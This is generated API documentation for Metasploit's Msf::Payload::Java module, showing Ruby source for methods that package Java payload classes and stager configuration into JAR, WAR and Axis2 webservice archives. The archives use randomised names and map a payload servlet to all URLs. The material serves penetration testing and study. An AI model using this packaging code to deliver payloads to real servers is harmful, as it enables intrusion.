Module: Msf::Payload::Java

Included in:
BindTcp, MeterpreterLoader, ReverseHttp, ReverseTcp
Defined in:
lib/msf/core/payload/java.rb

Defined Under Namespace

Modules: BindTcp, MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp

Instance Method Summary collapse

Instance Method Details

#class_filesObject

Default to no extra class files


150
151
152
# File 'lib/msf/core/payload/java.rb', line 150

def class_files
  []
end

#generate(opts = {}) ⇒ Object

Used by stagers to construct the payload jar file as a String


35
36
37
# File 'lib/msf/core/payload/java.rb', line 35

def generate(opts={})
  generate_jar(opts).pack
end

#generate_axis2(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a axis2 webservice file as a Rex::Zip::Jar. Stagers define a list of class files returned via class_files. The configuration file is created by the payload's #stager_config method.

Parameters:

  • :app_name (Hash)

    a customizable set of options

Returns:

  • (Rex::Zip::Jar)

120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
# File 'lib/msf/core/payload/java.rb', line 120

def generate_axis2(opts={})
  raise if not respond_to? :stager_config

  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  services_xml = %Q{<service name="#{app_name}" scope="application">
<description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description>
<parameter name="ServiceClass">metasploit.PayloadServlet</parameter>
<operation name="run">
 <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</operation>
</service>
}

  paths = [
    [ 'metasploit', 'Payload.class' ],
    [ 'metasploit', 'PayloadServlet.class' ]
  ] + class_files

  zip = Rex::Zip::Jar.new
  zip.add_file('META-INF/', '')
  zip.add_file('META-INF/services.xml', services_xml)
  zip.add_files(paths, MetasploitPayloads.path('java'))
  zip.add_file('metasploit.dat', stager_config(opts))
  zip.build_manifest(:app_name => app_name)

  zip
end

#generate_default_stage(opts = {}) ⇒ Object


21
22
23
24
25
26
27
28
29
30
# File 'lib/msf/core/payload/java.rb', line 21

def generate_default_stage(opts={})
  stage = ''
  stage_class_files.each do |path|
    data = MetasploitPayloads.read('java', path)
    stage << [data.length, data].pack('NA*')
  end
  stage << [0].pack('N')

  stage
end

#generate_jar(opts = {}) ⇒ Rex::Zip::Jar

Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define a list of class files from the class_files method. The configuration file is created by the payload's #stager_config method.

Parameters:

  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :main_class (String)

    the name of the Main-Class attribute in the manifest. Defaults to "metasploit.Payload"

  • :random (Boolean)

    Set to `true` to randomize the "metasploit" package name.

Returns:

  • (Rex::Zip::Jar)

49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# File 'lib/msf/core/payload/java.rb', line 49

def generate_jar(opts={})
  raise if not respond_to? :stager_config
  # Allow changing the jar's Main Class in the manifest so wrappers
  # around metasploit.Payload will work.
  main_class = opts[:main_class] || "metasploit.Payload"

  paths = [
    [ "metasploit", "Payload.class" ],
  ] + class_files

  jar = Rex::Zip::Jar.new
  jar.add_sub("metasploit") if opts[:random]
  jar.add_file("metasploit.dat", stager_config(opts))
  jar.add_files(paths, MetasploitPayloads.path('java'))
  jar.build_manifest(:main_class => main_class)

  jar
end

#generate_stage(opts = {}) ⇒ Object

Used by stages; all java stages need to define stage_class_files as an array of .class files located in data/java/

The staging protocol expects any number of class files, each prepended with its length, and terminated with a 0:

32-bit big endian length ][ first raw .class file

32-bit big endian length ][ Nth raw .class file
32-bit null

17
18
19
# File 'lib/msf/core/payload/java.rb', line 17

def generate_stage(opts={})
  generate_default_stage(opts)
end

#generate_war(opts = {}) ⇒ Object

Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.

Parameters:

  • opts (Hash) (defaults to: {})
  • :app_name (Hash)

    a customizable set of options


76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
# File 'lib/msf/core/payload/java.rb', line 76

def generate_war(opts={})
  raise if not respond_to? :stager_config
  zip = Rex::Zip::Jar.new

  web_xml = %q{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>NAME</servlet-name>
<servlet-class>metasploit.PayloadServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>NAME</servlet-name>
<url-pattern>/*</url-pattern>
</servlet-mapping>
</web-app>
}
  app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

  web_xml.gsub!(/NAME/, app_name)

  paths = [
    [ "metasploit", "Payload.class" ],
    [ "metasploit", "PayloadServlet.class" ],
  ] + class_files

  zip.add_file('WEB-INF/', '')
  zip.add_file('WEB-INF/web.xml', web_xml)
  zip.add_file("WEB-INF/classes/", "")
  zip.add_files(paths, MetasploitPayloads.path('java'), 'WEB-INF/classes/')
  zip.add_file("WEB-INF/classes/metasploit.dat", stager_config(opts))

  zip
end

#stage_class_filesObject

Default to no extra stage class files


155
156
157
# File 'lib/msf/core/payload/java.rb', line 155

def stage_class_files
  []
end